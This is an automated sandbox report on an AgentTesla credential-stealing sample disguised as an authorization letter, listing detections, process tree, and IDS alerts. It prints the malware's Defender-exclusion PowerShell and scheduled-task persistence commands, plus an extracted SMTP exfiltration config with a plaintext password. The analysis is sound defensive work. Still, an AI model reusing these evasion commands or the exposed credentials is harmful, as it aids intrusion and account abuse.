Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
autorization Letter.exe

Overview

General Information

Sample name:autorization Letter.exe
Analysis ID:1519119
MD5:457f6cb01c6f3f7922ac201f70111ae5
SHA1:934e5433fc83af812db461e3e7748c311e19b1bc
SHA256:ca471400001374bddf5e6ff03db7889cf53bd516fe64209faee8b894b454c3c5
Tags:AgentTeslaDHLexeuser-cocaman
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • autorization Letter.exe (PID: 6180 cmdline: "C:\Users\user\Desktop\autorization Letter.exe" MD5: 457F6CB01C6F3F7922AC201F70111AE5)
    • powershell.exe (PID: 528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6776 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3176 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 1576 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • tIFjYTCo.exe (PID: 3440 cmdline: C:\Users\user\AppData\Roaming\tIFjYTCo.exe MD5: 457F6CB01C6F3F7922AC201F70111AE5)
    • schtasks.exe (PID: 5960 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 6540 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • GUIVTme.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • GUIVTme.exe (PID: 5332 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.unitechautomations.com", "Username": "design@unitechautomations.com", "Password": "Unitech@123"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.3346316308.0000000002899000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000002.2204151615.000000000288A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0000000E.00000002.3346316308.0000000002891000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 15 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.2.autorization Letter.exe.44ec5b8.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                1.2.autorization Letter.exe.44ec5b8.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  1.2.autorization Letter.exe.44ec5b8.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x31d64:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x31dd6:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x31e60:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31ef2:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x31f5c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31fce:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x32064:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x320f4:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  1.2.autorization Letter.exe.44b1598.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    1.2.autorization Letter.exe.44b1598.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 10 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\autorization Letter.exe", ParentImage: C:\Users\user\Desktop\autorization Letter.exe, ParentProcessId: 6180, ParentProcessName: autorization Letter.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", ProcessId: 528, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 1576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GUIVTme
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\autorization Letter.exe", ParentImage: C:\Users\user\Desktop\autorization Letter.exe, ParentProcessId: 6180, ParentProcessName: autorization Letter.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", ProcessId: 528, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\tIFjYTCo.exe, ParentImage: C:\Users\user\AppData\Roaming\tIFjYTCo.exe, ParentProcessId: 3440, ParentProcessName: tIFjYTCo.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp", ProcessId: 5960, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.185.129.60, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 1576, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49711
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\autorization Letter.exe", ParentImage: C:\Users\user\Desktop\autorization Letter.exe, ParentProcessId: 6180, ParentProcessName: autorization Letter.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp", ProcessId: 3176, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\autorization Letter.exe", ParentImage: C:\Users\user\Desktop\autorization Letter.exe, ParentProcessId: 6180, ParentProcessName: autorization Letter.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe", ProcessId: 528, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\autorization Letter.exe", ParentImage: C:\Users\user\Desktop\autorization Letter.exe, ParentProcessId: 6180, ParentProcessName: autorization Letter.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp", ProcessId: 3176, ProcessName: schtasks.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-26T07:03:00.331719+020020301711A Network Trojan was detected192.168.2.549712192.185.129.60587TCP
                      2024-09-26T07:03:18.387344+020020301711A Network Trojan was detected192.168.2.549711192.185.129.60587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-26T07:03:14.516239+020028555421A Network Trojan was detected192.168.2.549711192.185.129.60587TCP
                      2024-09-26T07:03:20.151372+020028555421A Network Trojan was detected192.168.2.549712192.185.129.60587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-26T07:03:14.516239+020028552451A Network Trojan was detected192.168.2.549711192.185.129.60587TCP
                      2024-09-26T07:03:20.151372+020028552451A Network Trojan was detected192.168.2.549712192.185.129.60587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-26T07:03:00.331719+020028397231Malware Command and Control Activity Detected192.168.2.549712192.185.129.60587TCP
                      2024-09-26T07:03:18.387344+020028397231Malware Command and Control Activity Detected192.168.2.549711192.185.129.60587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-26T07:03:00.331719+020028400321A Network Trojan was detected192.168.2.549712192.185.129.60587TCP
                      2024-09-26T07:03:18.387344+020028400321A Network Trojan was detected192.168.2.549711192.185.129.60587TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.unitechautomations.com", "Username": "design@unitechautomations.com", "Password": "Unitech@123"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeReversingLabs: Detection: 57%
                      Multi AV Scanner detection for submitted file
                      Source: autorization Letter.exeReversingLabs: Detection: 57%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: autorization Letter.exeJoe Sandbox ML: detected
                      Source: autorization Letter.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: autorization Letter.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: PkJS.pdb source: autorization Letter.exe, tIFjYTCo.exe.1.dr
                      Source: Binary string: PkJS.pdbSHA256a source: autorization Letter.exe, tIFjYTCo.exe.1.dr
                      Source: Binary string: RegSvcs.pdb, source: GUIVTme.exe, 00000010.00000000.2249012079.0000000000902000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr
                      Source: Binary string: RegSvcs.pdb source: GUIVTme.exe, 00000010.00000000.2249012079.0000000000902000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49711 -> 192.185.129.60:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49711 -> 192.185.129.60:587
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49712 -> 192.185.129.60:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49712 -> 192.185.129.60:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49711 -> 192.185.129.60:587
                      Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.5:49711 -> 192.185.129.60:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49711 -> 192.185.129.60:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49712 -> 192.185.129.60:587
                      Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.5:49712 -> 192.185.129.60:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49712 -> 192.185.129.60:587
                      Source: Joe Sandbox ViewIP Address: 192.185.129.60 192.185.129.60
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: mail.unitechautomations.com
                      Source: autorization Letter.exe, tIFjYTCo.exe.1.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: autorization Letter.exe, tIFjYTCo.exe.1.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: RegSvcs.exe, 00000009.00000002.2204151615.000000000288A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3346316308.0000000002899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.unitechautomations.com
                      Source: autorization Letter.exe, tIFjYTCo.exe.1.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: autorization Letter.exe, 00000001.00000002.2159567789.0000000003475000.00000004.00000800.00020000.00000000.sdmp, tIFjYTCo.exe, 0000000A.00000002.2225613849.000000000272A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: autorization Letter.exe, 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: autorization Letter.exe, tIFjYTCo.exe.1.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, cPKWk.cs.Net Code: MPvOvSMQSR
                      Source: 1.2.autorization Letter.exe.44b1598.1.raw.unpack, cPKWk.cs.Net Code: MPvOvSMQSR

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.autorization Letter.exe.44b1598.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.autorization Letter.exe.44b1598.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\autorization Letter.exeCode function: 1_2_016BD3A41_2_016BD3A4
                      Source: C:\Users\user\Desktop\autorization Letter.exeCode function: 1_2_079367F81_2_079367F8
                      Source: C:\Users\user\Desktop\autorization Letter.exeCode function: 1_2_079300061_2_07930006
                      Source: C:\Users\user\Desktop\autorization Letter.exeCode function: 1_2_079300401_2_07930040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D242009_2_00D24200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2A4A89_2_00D2A4A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2D6689_2_00D2D668
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D298189_2_00D29818
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D24AD09_2_00D24AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D23EB89_2_00D23EB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2A4A59_2_00D2A4A5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05E1B4009_2_05E1B400
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05E19DCC9_2_05E19DCC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05E2E0789_2_05E2E078
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05E200409_2_05E20040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05E2C0589_2_05E2C058
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05E242B09_2_05E242B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05E232589_2_05E23258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05E25A389_2_05E25A38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05E239B09_2_05E239B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05E253589_2_05E25358
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeCode function: 10_2_00D0D3A410_2_00D0D3A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_027AA49314_2_027AA493
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_027A4AD014_2_027A4AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_027A3EB814_2_027A3EB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_027A420014_2_027A4200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_027AE86F14_2_027AE86F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_027A19E814_2_027A19E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05E8B40014_2_05E8B400
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05E89BB414_2_05E89BB4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05E98EDA14_2_05E98EDA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05E9E06014_2_05E9E060
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05E9004014_2_05E90040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05E942B014_2_05E942B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05E9325814_2_05E93258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05E95A3814_2_05E95A38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05E9399B14_2_05E9399B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05E9535814_2_05E95358
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05E9C31814_2_05E9C318
                      Source: autorization Letter.exeStatic PE information: invalid certificate
                      Source: autorization Letter.exe, 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs autorization Letter.exe
                      Source: autorization Letter.exe, 00000001.00000000.2085689123.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePkJS.exe0 vs autorization Letter.exe
                      Source: autorization Letter.exe, 00000001.00000002.2159567789.0000000003475000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs autorization Letter.exe
